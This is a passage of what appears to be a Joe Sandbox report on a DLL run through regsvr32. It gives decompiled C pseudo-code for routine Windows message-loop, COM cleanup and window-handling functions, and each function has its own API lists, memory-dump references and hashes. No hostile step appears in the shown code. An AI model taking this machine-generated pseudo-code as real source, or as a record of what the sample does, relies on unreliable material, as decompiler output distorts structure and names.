                                                                                                                							_t103 = E10032245(_t108, _t122, _t116, _t120, _t122, _t130);
                                                                                                                							 *(_t123 - 4) = 1;
                                                                                                                							E100235DF(_t103, _t123 - 0x48, _t103);
                                                                                                                							 *(_t123 - 4) = 0;
                                                                                                                							__imp__#9(_t123 - 0x58, _t123 - 0x58,  *(_t123 - 0x10) + 1);
                                                                                                                							_t89 = _t123 - 0x48;
                                                                                                                						}
                                                                                                                						 *((intOrPtr*)(_t123 - 0x38)) = _t89;
                                                                                                                						 *((intOrPtr*)(_t123 - 0x34)) = _t123 - 0x24;
                                                                                                                						 *((intOrPtr*)(_t123 - 0x30)) = 1;
                                                                                                                						 *((intOrPtr*)(_t123 - 0x2c)) = 1;
                                                                                                                						 *(_t120 + 0x88) = 1;
                                                                                                                						_t93 =  *((intOrPtr*)(_t120 + 0x50));
                                                                                                                						if(_t93 != 0) {
                                                                                                                							_t116 = _t123 - 0x1c;
                                                                                                                							_push(_t123 - 0x1c);
                                                                                                                							_push(0x100a4a1c);
                                                                                                                							_push(_t93);
                                                                                                                							if( *((intOrPtr*)( *_t93))() >= 0) {
                                                                                                                								_t96 =  *((intOrPtr*)(_t123 - 0x1c));
                                                                                                                								_t116 = _t123 - 0x38;
                                                                                                                								 *((intOrPtr*)( *_t96 + 0x18))(_t96,  *((intOrPtr*)(_t120 + 0x9c)), 0x100a47bc, 0, 4, _t123 - 0x38, 0, _t123 - 0x78, _t123 - 0x28);
                                                                                                                								_t98 =  *((intOrPtr*)(_t123 - 0x1c));
                                                                                                                								 *((intOrPtr*)( *_t98 + 8))(_t98);
                                                                                                                								 *(_t120 + 0x88) =  *(_t120 + 0x88) & 0x00000000;
                                                                                                                								if( *((intOrPtr*)(_t123 - 0x74)) != 0) {
                                                                                                                									__imp__#6( *((intOrPtr*)(_t123 - 0x74)));
                                                                                                                								}
                                                                                                                								if( *((intOrPtr*)(_t123 - 0x70)) != 0) {
                                                                                                                									__imp__#6( *((intOrPtr*)(_t123 - 0x70)));
                                                                                                                								}
                                                                                                                								if( *((intOrPtr*)(_t123 - 0x6c)) != 0) {
                                                                                                                									__imp__#6( *((intOrPtr*)(_t123 - 0x6c)));
                                                                                                                								}
                                                                                                                								 *(_t123 - 0x14) =  *(_t123 - 0x14) + 1;
                                                                                                                								 *(_t123 - 0x18) =  *(_t123 - 0x18) + 0x10;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						 *(_t123 - 4) =  *(_t123 - 4) | 0xffffffff;
                                                                                                                						__imp__#9(_t123 - 0x48);
                                                                                                                					} while ( *((intOrPtr*)(_t123 - 0x20)) != 0);
                                                                                                                					L17:
                                                                                                                					 *(_t123 - 0x10) =  *(_t123 - 0x10) + 1;
                                                                                                                				} while ( *(_t123 - 0x10) <  *((intOrPtr*)(_t122 + 0x10)));
                                                                                                                				goto L18;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10032763
                                                                                                                • _memset.LIBCMT ref: 100327CF
                                                                                                                  • Part of subcall function 100235FF: _memset.LIBCMT ref: 10023607
                                                                                                                • VariantClear.OLEAUT32(?), ref: 1003280F
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 10032890
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 1003289F
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 100328AE
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 100328C3
                                                                                                                  • Part of subcall function 10032245: __EH_prolog3.LIBCMT ref: 10032261
                                                                                                                  • Part of subcall function 10032245: VariantClear.OLEAUT32(?), ref: 100322C6
                                                                                                                  • Part of subcall function 100235DF: VariantCopy.OLEAUT32(00000000,00000000), ref: 100235ED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                • String ID:
                                                                                                                • API String ID: 2905758408-0
                                                                                                                • Opcode ID: d9832d25b98ae345620f190acc055fd0960a654323a07aa8102f2343d52582eb
                                                                                                                • Instruction ID: 71e90c444253352b4aa8153b2470761f7329699f876c3cffb1f3a0a95f4ec303
                                                                                                                • Opcode Fuzzy Hash: d9832d25b98ae345620f190acc055fd0960a654323a07aa8102f2343d52582eb
                                                                                                                • Instruction Fuzzy Hash: 6A51E271D00209EFEB51CFA4C985BEEBBB8FF08305F204569E516EB291DB74A945CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E1002F23F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed int _t59;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t64;
                                                                                                                				signed int _t69;
                                                                                                                				signed int _t70;
                                                                                                                				signed int _t71;
                                                                                                                				void* _t81;
                                                                                                                				intOrPtr* _t82;
                                                                                                                				void* _t97;
                                                                                                                				signed int _t98;
                                                                                                                				void* _t101;
                                                                                                                				void* _t102;
                                                                                                                				void* _t103;
                                                                                                                
                                                                                                                				_t103 = __eflags;
                                                                                                                				_push(0x60);
                                                                                                                				E1004764D(0x100904c6, __ebx, __edi, __esi);
                                                                                                                				_t97 =  *(_t101 + 8) + 0xffffff28;
                                                                                                                				E1001E397(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
                                                                                                                				 *(_t101 - 4) = 0;
                                                                                                                				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
                                                                                                                					L19:
                                                                                                                					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                                                                                					__eflags =  *(_t101 - 0x14);
                                                                                                                					if( *(_t101 - 0x14) != 0) {
                                                                                                                						_push( *((intOrPtr*)(_t101 - 0x18)));
                                                                                                                						_push(0);
                                                                                                                						E1001D714();
                                                                                                                					}
                                                                                                                					_t59 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                					L22:
                                                                                                                					return E10047725(_t59);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
                                                                                                                					L6:
                                                                                                                					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
                                                                                                                					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
                                                                                                                						goto L19;
                                                                                                                					}
                                                                                                                					_t81 = _t97 + 0xac;
                                                                                                                					__imp__#9(_t81);
                                                                                                                					_t63 =  *(_t97 + 0x50);
                                                                                                                					__eflags = _t63;
                                                                                                                					_t85 = 0 | __eflags != 0x00000000;
                                                                                                                					 *(_t101 + 8) = 0;
                                                                                                                					__eflags = __eflags != 0;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						L9:
                                                                                                                						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x100a4a1c, _t101 + 8);
                                                                                                                						__eflags = _t64;
                                                                                                                						if(_t64 < 0) {
                                                                                                                							goto L19;
                                                                                                                						}
                                                                                                                						E10049170(_t97, _t101 - 0x48, 0, 0x20);
                                                                                                                						E10049170(_t97, _t101 - 0x28, 0, 0x10);
                                                                                                                						_t69 =  *(_t101 + 8);
                                                                                                                						_t102 = _t102 + 0x18;
                                                                                                                						__eflags = _t69;
                                                                                                                						_t85 = 0 | __eflags != 0x00000000;
                                                                                                                						__eflags = __eflags != 0;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x100a47bc, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
                                                                                                                						__eflags =  *(_t101 - 0x44);
                                                                                                                						_t82 = __imp__#6;
                                                                                                                						 *(_t101 + 0xc) = _t70;
                                                                                                                						if( *(_t101 - 0x44) != 0) {
                                                                                                                							 *_t82( *(_t101 - 0x44));
                                                                                                                						}
                                                                                                                						__eflags =  *(_t101 - 0x40);
                                                                                                                						if( *(_t101 - 0x40) != 0) {
                                                                                                                							 *_t82( *(_t101 - 0x40));
                                                                                                                						}
                                                                                                                						__eflags =  *(_t101 - 0x3c);
                                                                                                                						if( *(_t101 - 0x3c) != 0) {
                                                                                                                							 *_t82( *(_t101 - 0x3c));
                                                                                                                						}
                                                                                                                						_t71 =  *(_t101 + 8);
                                                                                                                						 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                                                                                						__eflags =  *(_t101 + 0xc);
                                                                                                                						if( *(_t101 + 0xc) >= 0) {
                                                                                                                							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
                                                                                                                						}
                                                                                                                						goto L19;
                                                                                                                					}
                                                                                                                					L8:
                                                                                                                					_t63 = E1000A069(_t81, _t85, _t97, 0, __eflags);
                                                                                                                					goto L9;
                                                                                                                				}
                                                                                                                				 *(_t101 - 0x68) =  *(_t101 + 0xc);
                                                                                                                				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x64)) = 0;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x60)) = 0;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x54)) = 0;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x50)) = 0;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
                                                                                                                				E1002C9FF(_t97, _t101 - 0x6c);
                                                                                                                				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                                                                                				_t98 =  *((intOrPtr*)(_t101 - 0x54));
                                                                                                                				if( *(_t101 - 0x14) != 0) {
                                                                                                                					_push( *((intOrPtr*)(_t101 - 0x18)));
                                                                                                                					_push(0);
                                                                                                                					E1001D714();
                                                                                                                				}
                                                                                                                				_t59 = _t98;
                                                                                                                				goto L22;
                                                                                                                			}

















                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                • String ID:
                                                                                                                • API String ID: 3574576181-0
                                                                                                                • Opcode ID: 0c5c79690934b08080de730fa962a6b528dd591dd951afd2560f228c1dd8ac82
                                                                                                                • Instruction ID: 03b1f9187570ac732a2ad0fd53828fbe430a56604cb9a184f68fd8707445ec45
                                                                                                                • Opcode Fuzzy Hash: 0c5c79690934b08080de730fa962a6b528dd591dd951afd2560f228c1dd8ac82
                                                                                                                • Instruction Fuzzy Hash: 92413975901219EFCB01DFA4C8459EEBBB9FF45B90F50822AF019AA151C770AA81CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10013B72(intOrPtr* __ecx, signed int _a4) {
                                                                                                                				struct HWND__* _v4;
                                                                                                                				struct tagMSG* _v8;
                                                                                                                				int _v12;
                                                                                                                				int _v16;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				struct HWND__* _t42;
                                                                                                                				struct tagMSG* _t43;
                                                                                                                				signed int _t45;
                                                                                                                				void* _t48;
                                                                                                                				void* _t50;
                                                                                                                				int _t53;
                                                                                                                				long _t56;
                                                                                                                				signed int _t62;
                                                                                                                				intOrPtr* _t64;
                                                                                                                				intOrPtr* _t67;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_t63 = __ecx;
                                                                                                                				_t62 = 1;
                                                                                                                				_t67 = __ecx;
                                                                                                                				_v12 = 1;
                                                                                                                				_v16 = 0;
                                                                                                                				if((_a4 & 0x00000004) == 0 || (E100177F8(__ecx) & 0x10000000) != 0) {
                                                                                                                					_t62 = 0;
                                                                                                                				}
                                                                                                                				_t42 = GetParent( *(_t67 + 0x20));
                                                                                                                				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
                                                                                                                				_v4 = _t42;
                                                                                                                				_t43 = E10019F1B(0);
                                                                                                                				_t68 = UpdateWindow;
                                                                                                                				_v8 = _t43;
                                                                                                                				while(1) {
                                                                                                                					L14:
                                                                                                                					_t73 = _v12;
                                                                                                                					if(_v12 == 0) {
                                                                                                                						goto L15;
                                                                                                                					}
                                                                                                                					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
                                                                                                                					if(__eflags != 0) {
                                                                                                                						while(1) {
                                                                                                                							L15:
                                                                                                                							_t45 = E1001A4C2(_t63, 0, _t67, _t73);
                                                                                                                							if(_t45 == 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							if(_t62 != 0) {
                                                                                                                								_t53 = _v8->message;
                                                                                                                								if(_t53 == 0x118 || _t53 == 0x104) {
                                                                                                                									E1001793D(_t67, 1);
                                                                                                                									UpdateWindow( *(_t67 + 0x20));
                                                                                                                									_t62 = 0;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_t64 = _t67;
                                                                                                                							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
                                                                                                                							_t79 = _t48;
                                                                                                                							if(_t48 == 0) {
                                                                                                                								_t39 = _t67 + 0x3c;
                                                                                                                								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
                                                                                                                								__eflags =  *_t39;
                                                                                                                								return  *((intOrPtr*)(_t67 + 0x44));
                                                                                                                							} else {
                                                                                                                								_t50 = E1001A352(_t62, _t64, 0, _t67, _t68, _t79, _v8);
                                                                                                                								_pop(_t63);
                                                                                                                								if(_t50 != 0) {
                                                                                                                									_v12 = 1;
                                                                                                                									_v16 = 0;
                                                                                                                								}
                                                                                                                								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									goto L14;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_push(0);
                                                                                                                						E1001935C();
                                                                                                                						return _t45 | 0xffffffff;
                                                                                                                					}
                                                                                                                					__eflags = _t62;
                                                                                                                					if(_t62 != 0) {
                                                                                                                						_t63 = _t67;
                                                                                                                						E1001793D(_t67, 1);
                                                                                                                						UpdateWindow( *(_t67 + 0x20));
                                                                                                                						_t62 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					}
                                                                                                                					__eflags = _a4 & 0x00000001;
                                                                                                                					if((_a4 & 0x00000001) == 0) {
                                                                                                                						__eflags = _v4;
                                                                                                                						if(_v4 != 0) {
                                                                                                                							__eflags = _v16;
                                                                                                                							if(_v16 == 0) {
                                                                                                                								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					__eflags = _a4 & 0x00000002;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						L13:
                                                                                                                						_v12 = 0;
                                                                                                                						continue;
                                                                                                                					} else {
                                                                                                                						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
                                                                                                                						_v16 = _v16 + 1;
                                                                                                                						__eflags = _t56;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						goto L13;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				goto L15;
                                                                                                                			}























                                                                                                                APIs
                                                                                                                • GetParent.USER32(00000004), ref: 10013BA0
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10013BC7
                                                                                                                • UpdateWindow.USER32 ref: 10013BE1
                                                                                                                • SendMessageA.USER32 ref: 10013C05
                                                                                                                • SendMessageA.USER32 ref: 10013C1F
                                                                                                                • UpdateWindow.USER32 ref: 10013C65
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10013C99
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                • String ID:
                                                                                                                • API String ID: 2853195852-0
                                                                                                                • Opcode ID: c3e276bd65efa7df5bba1a0d96a9bb273c94ca5dcf2f5af77d8346f14572e0c2
                                                                                                                • Instruction ID: bcd71ec54be47078b87aecd0e4f52c04ce37c12de65d41b37e9f73b1c2401c47
                                                                                                                • Opcode Fuzzy Hash: c3e276bd65efa7df5bba1a0d96a9bb273c94ca5dcf2f5af77d8346f14572e0c2
                                                                                                                • Instruction Fuzzy Hash: 1A41C0306047819BD711CF258988E5BBBF4FFC5B84F00892CF492A9061D772D884CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E10019E81(int __ebx, long __ecx, struct HWND__* __edi) {
                                                                                                                				long _v4;
                                                                                                                				char _v28;
                                                                                                                				intOrPtr _v40;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				long _t20;
                                                                                                                				long _t21;
                                                                                                                				struct HWND__* _t22;
                                                                                                                				long _t23;
                                                                                                                				struct HWND__* _t24;
                                                                                                                				long _t25;
                                                                                                                				struct HWND__* _t26;
                                                                                                                				void* _t33;
                                                                                                                				void* _t35;
                                                                                                                				long _t39;
                                                                                                                				long _t41;
                                                                                                                				intOrPtr _t43;
                                                                                                                				struct HWND__* _t47;
                                                                                                                				struct HWND__* _t49;
                                                                                                                				long _t51;
                                                                                                                				long _t53;
                                                                                                                
                                                                                                                				_t46 = __edi;
                                                                                                                				_t39 = __ecx;
                                                                                                                				_t37 = __ebx;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
                                                                                                                					_t51 = E10012730();
                                                                                                                					__eflags = _t51;
                                                                                                                					if(_t51 != 0) {
                                                                                                                						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
                                                                                                                						__eflags = _t20;
                                                                                                                						_t41 = _t51;
                                                                                                                						_pop(_t52);
                                                                                                                						if(_t20 != 0) {
                                                                                                                							_t53 = _t41;
                                                                                                                							_t21 =  *(_t53 + 0x64);
                                                                                                                							__eflags = _t21;
                                                                                                                							if(_t21 == 0) {
                                                                                                                								_pop(_t52);
                                                                                                                								goto L12;
                                                                                                                							} else {
                                                                                                                								__eflags = _t21 - 0x3f107;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_t35 = E1001E302(__ebx, __edi, _t53, __eflags);
                                                                                                                									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
                                                                                                                								}
                                                                                                                								return _t21;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							L12:
                                                                                                                							_push(_t41);
                                                                                                                							_push(_t37);
                                                                                                                							_push(0);
                                                                                                                							_push(_t52);
                                                                                                                							_push(_t46);
                                                                                                                							_v4 = _t41;
                                                                                                                							_t22 = GetCapture();
                                                                                                                							_t51 = SendMessageA;
                                                                                                                							_t37 = 0x365;
                                                                                                                							while(1) {
                                                                                                                								_t47 = _t22;
                                                                                                                								__eflags = _t47;
                                                                                                                								if(_t47 == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t23 = SendMessageA(_t47, _t37, 0, 0);
                                                                                                                								__eflags = _t23;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									L27:
                                                                                                                									return _t23;
                                                                                                                								} else {
                                                                                                                									_t22 = E100158CD(_t41, _t47, __eflags, _t47);
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L33;
                                                                                                                							}
                                                                                                                							_t24 = GetFocus();
                                                                                                                							while(1) {
                                                                                                                								_t46 = _t24;
                                                                                                                								__eflags = _t46;
                                                                                                                								if(_t46 == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t23 = SendMessageA(_t46, _t37, 0, 0);
                                                                                                                								__eflags = _t23;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L27;
                                                                                                                								} else {
                                                                                                                									_t24 = E100158CD(_t41, _t46, __eflags, _t46);
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L33;
                                                                                                                							}
                                                                                                                							_t39 = _v4;
                                                                                                                							_t25 = E10015912(_t37, _t39, _t46);
                                                                                                                							__eflags = _t25;
                                                                                                                							if(_t25 != 0) {
                                                                                                                								_t26 = GetLastActivePopup( *(_t25 + 0x20));
                                                                                                                								while(1) {
                                                                                                                									_t49 = _t26;
                                                                                                                									__eflags = _t49;
                                                                                                                									_push(0);
                                                                                                                									if(_t49 == 0) {
                                                                                                                										break;
                                                                                                                									}
                                                                                                                									_t23 = SendMessageA(_t49, _t37, 0, ??);
                                                                                                                									__eflags = _t23;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t26 = E100158CD(_t39, _t49, __eflags, _t49);
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                									goto L27;
                                                                                                                								}
                                                                                                                								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
                                                                                                                								goto L27;
                                                                                                                							} else {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						L1:
                                                                                                                						_push(0);
                                                                                                                						_push(_t39);
                                                                                                                						_v28 = 0x100b8618;
                                                                                                                						L10048E48( &_v28, 0x100aff30);
                                                                                                                						asm("int3");
                                                                                                                						_push(4);
                                                                                                                						E1004764D(0x1008dd26, _t37, _t46, _t51);
                                                                                                                						_t43 = E10020454(0x104);
                                                                                                                						_v40 = _t43;
                                                                                                                						_t33 = 0;
                                                                                                                						_v28 = 0;
                                                                                                                						if(_t43 != 0) {
                                                                                                                							_t33 = E1001DB72(_t43);
                                                                                                                						}
                                                                                                                						return E10047725(_t33);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					__eflags = __eax - 0x3f107;
                                                                                                                					if(__eax != 0x3f107) {
                                                                                                                						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
                                                                                                                					}
                                                                                                                					return __eax;
                                                                                                                				}
                                                                                                                				L33:
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                • String ID:
                                                                                                                • API String ID: 3219385341-0
                                                                                                                • Opcode ID: 0f9cf2f9a770d9057ca46717b984a156014cd5c889fc452cf32eb1698ca24344
                                                                                                                • Instruction ID: c83883cea261492dbcc6de6b44b63371930bd8a8e6fe2a30bc088c65533c2fe6
                                                                                                                • Opcode Fuzzy Hash: 0f9cf2f9a770d9057ca46717b984a156014cd5c889fc452cf32eb1698ca24344
                                                                                                                • Instruction Fuzzy Hash: 4B312179704216EBDE21EB24EC84DAF76ECEF8A6C5B170479F800CB211CB32DC4196A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10014118(intOrPtr* __ecx) {
                                                                                                                				struct HWND__* _v40;
                                                                                                                				struct HWND__* _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				void* _v52;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				long _t43;
                                                                                                                				struct HWND__* _t48;
                                                                                                                				long _t61;
                                                                                                                				intOrPtr* _t63;
                                                                                                                				signed int _t64;
                                                                                                                				void* _t69;
                                                                                                                				intOrPtr _t71;
                                                                                                                				intOrPtr* _t72;
                                                                                                                
                                                                                                                				_t72 = __ecx;
                                                                                                                				_t69 = E10019F12();
                                                                                                                				if(_t69 != 0) {
                                                                                                                					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
                                                                                                                						 *((intOrPtr*)(_t69 + 0x20)) = 0;
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
                                                                                                                						 *((intOrPtr*)(_t69 + 0x24)) = 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t63 =  *((intOrPtr*)(_t72 + 0x48));
                                                                                                                				if(_t63 != 0) {
                                                                                                                					 *((intOrPtr*)( *_t63 + 0x50))();
                                                                                                                					 *((intOrPtr*)(_t72 + 0x48)) = 0;
                                                                                                                				}
                                                                                                                				_t64 =  *(_t72 + 0x4c);
                                                                                                                				if(_t64 != 0) {
                                                                                                                					 *((intOrPtr*)( *_t64 + 4))(1);
                                                                                                                				}
